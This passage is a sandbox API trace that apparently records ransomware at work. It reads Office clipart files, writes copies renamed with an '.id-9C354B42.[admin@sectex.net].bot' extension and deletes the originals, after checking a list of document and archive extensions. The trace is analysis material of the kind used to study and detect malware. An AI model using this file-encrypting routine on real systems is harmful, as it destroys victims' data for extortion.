	[0147.542] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0147.542] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\FD02161_.WMF") returned 63
	[0147.542] lstrlenW (lpString=".jpg") returned 4
	[0147.542] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0147.542] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0147.542] lstrlenW (lpString="HH00241_.WMF") returned 12
	[0147.542] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00241_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00241_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c8
	[0147.543] GetFileSizeEx (in: hFile=0x3c8, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=1960) returned 1
	[0147.543] CloseHandle (hObject=0x3c8) returned 1
	[0147.543] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00241_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00241_.wmf")) returned 0x20
	[0147.543] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00241_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00241_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0147.543] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00241_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00241_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c8
	[0147.543] SetFilePointerEx (in: hFile=0x3c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.544] SetFilePointerEx (in: hFile=0x3c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.544] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00241_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00241_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3bc
	[0147.544] GetLastError () returned 0x0
	[0147.544] ReadFile (in: hFile=0x3c8, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x7a8, lpOverlapped=0x0) returned 1
	[0147.558] WriteFile (in: hFile=0x3bc, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0x7b0, lpOverlapped=0x0) returned 1
	[0147.559] ReadFile (in: hFile=0x3c8, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0147.559] WriteFile (in: hFile=0x3bc, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0147.559] SetEndOfFile (hFile=0x3bc) returned 1
	[0147.559] CloseHandle (hObject=0x3bc) returned 1
	[0147.559] SetFilePointerEx (in: hFile=0x3c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.559] SetEndOfFile (hFile=0x3c8) returned 1
	[0147.561] CloseHandle (hObject=0x3c8) returned 1
	[0147.561] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00241_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0147.561] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00241_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00241_.wmf")) returned 1
	[0147.562] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00241_.WMF") returned 63
	[0147.562] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00241_.WMF") returned 63
	[0147.562] lstrlenW (lpString=".doc") returned 4
	[0147.562] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0147.562] lstrlenW (lpString=".docx") returned 5
	[0147.562] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0147.562] lstrlenW (lpString=".pdf") returned 4
	[0147.562] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0147.562] lstrlenW (lpString=".xls") returned 4
	[0147.562] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0147.562] lstrlenW (lpString=".xlsx") returned 5
	[0147.562] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0147.562] lstrlenW (lpString=".ppt") returned 4
	[0147.562] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0147.565] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00241_.WMF") returned 63
	[0147.565] lstrlenW (lpString=".zip") returned 4
	[0147.565] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0147.565] lstrlenW (lpString=".rar") returned 4
	[0147.565] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0147.565] lstrlenW (lpString=".bz2") returned 4
	[0147.565] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0147.565] lstrlenW (lpString=".7z") returned 3
	[0147.565] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0147.565] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00241_.WMF") returned 63
	[0147.565] lstrlenW (lpString=".dbf") returned 4
	[0147.565] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0147.565] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00241_.WMF") returned 63
	[0147.565] lstrlenW (lpString=".1cd") returned 4
	[0147.565] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0147.565] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00241_.WMF") returned 63
	[0147.565] lstrlenW (lpString=".jpg") returned 4
	[0147.565] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0147.565] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00241_.WMF") returned 63
	[0147.565] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00241_.WMF") returned 63
	[0147.565] lstrlenW (lpString=".doc") returned 4
	[0147.565] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0147.565] lstrlenW (lpString=".docx") returned 5
	[0147.565] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0147.565] lstrlenW (lpString=".pdf") returned 4
	[0147.566] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0147.566] lstrlenW (lpString=".xls") returned 4
	[0147.566] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0147.566] lstrlenW (lpString=".xlsx") returned 5
	[0147.566] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0147.566] lstrlenW (lpString=".ppt") returned 4
	[0147.566] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0147.566] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00241_.WMF") returned 63
	[0147.566] lstrlenW (lpString=".zip") returned 4
	[0147.566] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0147.566] lstrlenW (lpString=".rar") returned 4
	[0147.566] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0147.566] lstrlenW (lpString=".bz2") returned 4
	[0147.566] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0147.566] lstrlenW (lpString=".7z") returned 3
	[0147.566] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0147.566] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00241_.WMF") returned 63
	[0147.566] lstrlenW (lpString=".dbf") returned 4
	[0147.566] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0147.566] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00241_.WMF") returned 63
	[0147.566] lstrlenW (lpString=".1cd") returned 4
	[0147.566] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0147.566] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00241_.WMF") returned 63
	[0147.566] lstrlenW (lpString=".jpg") returned 4
	[0147.566] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0147.566] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0147.566] lstrlenW (lpString="HH00276_.WMF") returned 12
	[0147.567] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00276_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00276_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c8
	[0147.567] GetFileSizeEx (in: hFile=0x3c8, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=3016) returned 1
	[0147.567] CloseHandle (hObject=0x3c8) returned 1
	[0147.567] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00276_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00276_.wmf")) returned 0x20
	[0147.568] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00276_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00276_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0147.568] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00276_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00276_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c8
	[0147.568] SetFilePointerEx (in: hFile=0x3c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.568] SetFilePointerEx (in: hFile=0x3c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.568] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00276_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00276_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3bc
	[0147.569] GetLastError () returned 0x0
	[0147.569] ReadFile (in: hFile=0x3c8, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0xbc8, lpOverlapped=0x0) returned 1
	[0147.570] WriteFile (in: hFile=0x3bc, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xbd0, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xbd0, lpOverlapped=0x0) returned 1
	[0147.571] ReadFile (in: hFile=0x3c8, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0147.571] WriteFile (in: hFile=0x3bc, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0147.571] SetEndOfFile (hFile=0x3bc) returned 1
	[0147.571] CloseHandle (hObject=0x3bc) returned 1
	[0147.571] SetFilePointerEx (in: hFile=0x3c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.571] SetEndOfFile (hFile=0x3c8) returned 1
	[0147.573] CloseHandle (hObject=0x3c8) returned 1
	[0147.573] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00276_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0147.576] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00276_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00276_.wmf")) returned 1
	[0147.577] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00276_.WMF") returned 63
	[0147.577] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00276_.WMF") returned 63
	[0147.577] lstrlenW (lpString=".doc") returned 4
	[0147.577] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0147.577] lstrlenW (lpString=".docx") returned 5
	[0147.577] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0147.577] lstrlenW (lpString=".pdf") returned 4
	[0147.577] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0147.577] lstrlenW (lpString=".xls") returned 4
	[0147.577] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0147.577] lstrlenW (lpString=".xlsx") returned 5
	[0147.577] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0147.577] lstrlenW (lpString=".ppt") returned 4
	[0147.577] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0147.577] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00276_.WMF") returned 63
	[0147.577] lstrlenW (lpString=".zip") returned 4
	[0147.577] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0147.577] lstrlenW (lpString=".rar") returned 4
	[0147.577] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0147.577] lstrlenW (lpString=".bz2") returned 4
	[0147.577] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0147.577] lstrlenW (lpString=".7z") returned 3
	[0147.577] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0147.577] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00276_.WMF") returned 63
	[0147.577] lstrlenW (lpString=".dbf") returned 4
	[0147.577] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0147.577] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00276_.WMF") returned 63
	[0147.577] lstrlenW (lpString=".1cd") returned 4
	[0147.577] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0147.577] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00276_.WMF") returned 63
	[0147.577] lstrlenW (lpString=".jpg") returned 4
	[0147.578] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0147.578] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00276_.WMF") returned 63
	[0147.578] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00276_.WMF") returned 63
	[0147.578] lstrlenW (lpString=".doc") returned 4
	[0147.578] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0147.578] lstrlenW (lpString=".docx") returned 5
	[0147.578] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0147.578] lstrlenW (lpString=".pdf") returned 4
	[0147.578] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0147.578] lstrlenW (lpString=".xls") returned 4
	[0147.578] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0147.578] lstrlenW (lpString=".xlsx") returned 5
	[0147.578] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0147.578] lstrlenW (lpString=".ppt") returned 4
	[0147.578] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0147.578] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00276_.WMF") returned 63
	[0147.578] lstrlenW (lpString=".zip") returned 4
	[0147.578] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0147.578] lstrlenW (lpString=".rar") returned 4
	[0147.578] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0147.578] lstrlenW (lpString=".bz2") returned 4
	[0147.578] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0147.578] lstrlenW (lpString=".7z") returned 3
	[0147.578] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0147.578] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00276_.WMF") returned 63
	[0147.578] lstrlenW (lpString=".dbf") returned 4
	[0147.578] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0147.578] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00276_.WMF") returned 63
	[0147.578] lstrlenW (lpString=".1cd") returned 4
	[0147.578] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0147.579] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00276_.WMF") returned 63
	[0147.579] lstrlenW (lpString=".jpg") returned 4
	[0147.579] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0147.579] lstrcmpiW (lpString1=".WMF", lpString2=".bot") returned 1
	[0147.579] lstrlenW (lpString="HH00334_.WMF") returned 12
	[0147.579] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00334_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00334_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c8
	[0147.579] GetFileSizeEx (in: hFile=0x3c8, lpFileSize=0xa40ff1c | out: lpFileSize=0xa40ff1c*=1528) returned 1
	[0147.579] CloseHandle (hObject=0x3c8) returned 1
	[0147.579] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00334_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00334_.wmf")) returned 0x20
	[0147.579] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00334_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00334_.wmf.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0147.580] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00334_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00334_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c8
	[0147.580] SetFilePointerEx (in: hFile=0x3c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.580] SetFilePointerEx (in: hFile=0x3c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.580] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00334_.WMF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00334_.wmf.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3bc
	[0147.580] GetLastError () returned 0x0
	[0147.580] ReadFile (in: hFile=0x3c8, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x5f8, lpOverlapped=0x0) returned 1
	[0147.582] WriteFile (in: hFile=0x3bc, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0x600, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0x600, lpOverlapped=0x0) returned 1
	[0147.583] ReadFile (in: hFile=0x3c8, lpBuffer=0xaf60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa40fed4, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesRead=0xa40fed4*=0x0, lpOverlapped=0x0) returned 1
	[0147.583] WriteFile (in: hFile=0x3bc, lpBuffer=0xaf60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa40fc9c, lpOverlapped=0x0 | out: lpBuffer=0xaf60020*, lpNumberOfBytesWritten=0xa40fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0147.583] SetEndOfFile (hFile=0x3bc) returned 1
	[0147.583] CloseHandle (hObject=0x3bc) returned 1
	[0147.583] SetFilePointerEx (in: hFile=0x3c8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa40fec8 | out: lpNewFilePointer=0x0) returned 1
	[0147.583] SetEndOfFile (hFile=0x3c8) returned 1
	[0147.585] CloseHandle (hObject=0x3c8) returned 1
	[0147.585] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00334_.WMF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0147.586] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00334_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00334_.wmf")) returned 1
	[0147.586] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00334_.WMF") returned 63
	[0147.586] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00334_.WMF") returned 63
	[0147.586] lstrlenW (lpString=".doc") returned 4
	[0147.586] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0147.586] lstrlenW (lpString=".docx") returned 5
	[0147.586] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0147.586] lstrlenW (lpString=".pdf") returned 4
	[0147.586] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0147.586] lstrlenW (lpString=".xls") returned 4
	[0147.586] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0147.586] lstrlenW (lpString=".xlsx") returned 5
	[0147.586] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0147.587] lstrlenW (lpString=".ppt") returned 4
	[0147.587] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0147.587] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00334_.WMF") returned 63
	[0147.587] lstrlenW (lpString=".zip") returned 4
	[0147.587] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0147.587] lstrlenW (lpString=".rar") returned 4
	[0147.587] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0147.587] lstrlenW (lpString=".bz2") returned 4
	[0147.587] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0147.587] lstrlenW (lpString=".7z") returned 3
	[0147.587] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0147.587] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00334_.WMF") returned 63
	[0147.587] lstrlenW (lpString=".dbf") returned 4
	[0147.587] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0147.587] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00334_.WMF") returned 63
	[0147.587] lstrlenW (lpString=".1cd") returned 4
	[0147.587] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0147.587] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00334_.WMF") returned 63
	[0147.587] lstrlenW (lpString=".jpg") returned 4
	[0147.587] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1
	[0147.587] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00334_.WMF") returned 63
	[0147.587] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00334_.WMF") returned 63
	[0147.587] lstrlenW (lpString=".doc") returned 4
	[0147.587] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1
	[0147.587] lstrlenW (lpString=".docx") returned 5
	[0147.587] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1
	[0147.587] lstrlenW (lpString=".pdf") returned 4
	[0147.587] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1
	[0147.587] lstrlenW (lpString=".xls") returned 4
	[0147.587] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1
	[0147.588] lstrlenW (lpString=".xlsx") returned 5
	[0147.588] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1
	[0147.588] lstrlenW (lpString=".ppt") returned 4
	[0147.588] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1
	[0147.588] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00334_.WMF") returned 63
	[0147.588] lstrlenW (lpString=".zip") returned 4
	[0147.588] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1
	[0147.588] lstrlenW (lpString=".rar") returned 4
	[0147.588] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1
	[0147.588] lstrlenW (lpString=".bz2") returned 4
	[0147.588] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1
	[0147.588] lstrlenW (lpString=".7z") returned 3
	[0147.588] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1
	[0147.588] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00334_.WMF") returned 63
	[0147.588] lstrlenW (lpString=".dbf") returned 4
	[0147.588] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1
	[0147.588] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00334_.WMF") returned 63
	[0147.588] lstrlenW (lpString=".1cd") returned 4
	[0147.588] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1
	[0147.588] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00334_.WMF") returned 63
	[0147.588] lstrlenW (lpString=".jpg") returned 4
